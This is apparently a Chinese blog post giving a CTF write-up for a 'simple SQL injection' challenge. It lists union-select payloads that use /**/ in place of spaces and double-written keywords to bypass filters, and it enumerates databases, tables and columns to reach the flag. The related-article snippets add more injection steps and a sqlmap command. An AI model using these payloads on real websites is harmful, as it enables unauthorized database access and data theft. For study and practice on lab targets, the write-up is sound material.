实验吧-简单的SQL注入

最新推荐文章于 2024-04-05 22:03:02 发布
最新推荐文章于 2024-04-05 22:03:02 发布
阅读量384 收藏
点赞数
分类专栏: CTF-实验吧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyj_1216/article/details/89065153
版权

题目来源:

http://ctf5.shiyanbar.com/423/web/

题目

writeup

1、进入页面后,尝试输入1

1
2
发现注入点

2、尝试注入

首先尝试

?id=1'

4

其次,尝试

?id=1 and 1=1

3
15
发现,没有and,且,空格被+替代

  • 知识点:可用/**/,()来替代

进行尝试(这里用/**/来代替空格),再次尝试注入
67
3、尝试爆数据库
89

4、尝试爆表名
1011发现flag

5、尝试爆列名
12结果发现了过滤:
column_nameinformation_schema.columns过滤了

这里尝试双写绕过13发现flag

6、获得flag
14

后话

此题基础,可以根据提示信息发现过滤点~

?id=1'
?id=1 and 1=1
?id=1'/**/and/**/'1'='1
?id=1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
?id=1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
?id=1'/**/union/**/select/**/column_nacolumn_nameme/**/from/**/information_schema.columinformation_schema.columnsns/**/where/**/table_name='flag
?id=1'/**/union/**/select/**/flag/**/where/**/'1'='1
白衣w
关注
专栏目录
24-4 SQL 注入 - http头注入之referer注入
weixin_43263566的博客
02-28 421
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
决斗场 - 实验吧 WEB 简单sql注入
RaAlGhul的博客
11-14 2105
题目链接:http://www.shiyanbar.com/ctf/1875 题目提示:通过注入获得flag值。 点开题目,又是一个简洁的界面让我一脸懵逼(0.0) 好吧,开始我们的注入之旅。 首先,随便往框里面输入字符和数字,发现当输入1、2、3的时候有查询结果。 接下来进行注入的第一步测试,输入一个带单引号的数据,目的是测试是否对构造SQL的字符串进行了过滤。当把带有
实验吧---简单sql注入
mengtongxch的博客
10-19 516
通过注入获得flag值(提交格式:flag{})。 解题链接: http://ctf5.shiyanbar.com/423/web/ 首先呢点击这个链接,出现以下界面 当我们在框里面输入1,2,3的时候会出现一些东西,例如 用sqlmap扫描一下爆出其数据库,数据表,字段 参考网址:https://www.cnblogs.com/baifan261...
实验sql注入
3tu6b0rn的博客
03-23 301
题目链接:http://ctf5.shiyanbar.com/8/index.php?id=1 判断是否存在sql注入 ctf5.shiyanbar.com/8/index.php?id=1' 报错 ctf5.shiyanbar.com/8/index.php?id=1 and 1=1 正常打开 ctf5.shiyanbar.com/8/index.php?id=1 and 1=2 ...
sql简单注入
weixin_51646864的博客
06-13 678
原理: 当我们在查询一些数据时,输入我们指定的查询内容后,后台会根据用户的输入来执行SQL语句查询,类似于SELECT * FROM xxx表 WHERE id=’’,而用户可以在id字段构造一些危险的查询语句。 简单union注入步骤: 这里以攻防世界的一个题目的模型进行注入。 1、判断注入漏洞: (1)and 1=1 / and 1=2 若回显页面不同则说明是整形注入,否则不是 (2)-1/+1 回显下一个或上一个页面说明是整形注入,否则不是 (3)单引号判断 ‘ 显示数据库错误信息或者页面回显不同,说
简单SQL注入(小白级)
m0_46625346的博客
05-18 469
简单SQL注入 1.找数据库名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(schema_name),3 from information_schema.schemata %23 //找数据库名 得到wfafaefawcaf 2.找表名 http://IP地址/sqli-labs/Less-1/?id=11111111’ union select 1,group_concat(table_name),3 f
网络安全-实验六-SQL注入-基本手工注入.docx
11-10
总之,SQL注入是Web应用安全的重要课题,通过实践这个实验,不仅可以增强对这种攻击的理解,还能提升对网络安全防护的意识。对于开发者而言,应当时刻警惕潜在的安全风险,以构建更健壮的系统。
网络安全---SQL注入攻击
最新发布
zdsxc_的博客
04-05 1296
容器通常是一次性的,因此一旦被销毁,容器内的所有数据都会丢失。对于此次实验,我们确实希望将数据保留在 MySQL 数据库中,确保我们在关闭容器时,我们不会丢失工作。为此,我们将主机上的mysql_data文件夹(在 MySQL 容器运行后,在Labsetup文件夹内创建)装载(mounted)到MySQL容器内的 /var/lib/mysql 文件夹中。mysql_data文件夹是 MySQL 存储其数据库的地方。因此,即使容器被销毁,数据库中的数据仍保留。
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
【网络安全-实验七-SQL注入-盲注+sqlmap使用】 SQL注入是一种常见的网络攻击方式,它通过在应用程序的输入参数中嵌入恶意SQL代码,从而控制或篡改数据库的行为。在这个实验中,我们将深入理解SQL注入的盲注类型,并...
常规漏洞利用-sql注入实验指导书.pdf
08-03
根据提供的文档内容,本篇实验指导书详细介绍了如何利用常规漏洞中的SQL注入进行实验操作。以下是针对文档内容展开的知识点总结: 1. 实验准备和DVWA基础 实验开始前需要做好准备工作,包括熟悉实验平台的使用环境...
实验吧-简单sql注入之2
臭nana的博客
01-10 252
看到网上手工的wp那么多,就写一个sqlmap的 直接kali终端一条指令sqlmap -u http://ctf5.shiyanbar.com/web/index_2.php --dump --batch --tamper=space2comment 拿到flag
简单sql注入入门
d2231300271的博客
03-24 403
基本流程是:观察注入点->判断参数类型-->判断列数(group by或order by)-->观察是否存在显示位(就是页面能够显示列数据的位置(实践理解)),语法报错,异常页面显示(根据不同情况选择不同的注入方式)-->根据不同的注入方式依次显示库,列,表。当前99%以上的MySQL版本都是5.0以上,都支information_schema 库(),所以我们会使用该库进行爆数据库-->爆数据表--爆数据列-->爆数据(类似于根据目录查页数然后翻到相对于的位置)字段表示的是数据库中所有的字段信息。
实验简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 181
接上面一篇博客。 实验简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。 输入 1' and 1=1# 按理...
记一次简单SQL注入
he320631127的博客
08-06 566
参考:http://103.238.227.13:10083/ bugku 可以看到编码是gb2312 测试注入点 id=1和id=1‘ 都没错 应该是宽字节注入,在试试 id=%df’ 报错 接着来 输入字段id=%df’ union select 1,2 %23 查看数据库的名 查看要找的key表里面的string ...
实验简单sql注入解题思路
ZweLL032的博客
03-17 8307
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag fro
CTF-实验简单sql注入
才不是小弱鸡的博客
05-07 1668
好吧,其实这题我也是看了wp才知道的写wp的老哥个个都是人才,脑洞很大,知识丰富,还会嘤嘤嘤,我超喜欢的。咳咳咳,跑题了,这题一看就是sql注入嘛(别问我为什么知道,自己看题目名)先进行过滤测试。先试试1 and 1=1,发现返回显然and被过滤了然后继续测试,结果发现sql语句基本上都被过滤了QAQ看wp发现这里其实是过滤后面带有空格的关键字了解这个就可以开始愉快的注入了先查一下数据库 1'/*...
SQL简单注入步骤
m0_62092622的博客
01-25 2337
以sql-labs第一关为例 检查网站能否注入 http://localhost:63342/WWW/sqli-labs/Less-1/index.php?id=1' //记得单引号要在英文输入法下 输入单引号之前不报错,输入单引号后报错,即可说明网站存在注入 查询表列数 http://localhost:63342/WWW/sqli-labs/Less-1/index.php?id=1' order by 1 --+ http://localhost:6
简单sql注入——实验
weixin_34290631的博客
07-11 465
刚刚做了实验吧的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 简单sql注入分值:10 来源:实验吧 难度:中 参与人数:18007人 Get Flag:5644人 答题人数:651...
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值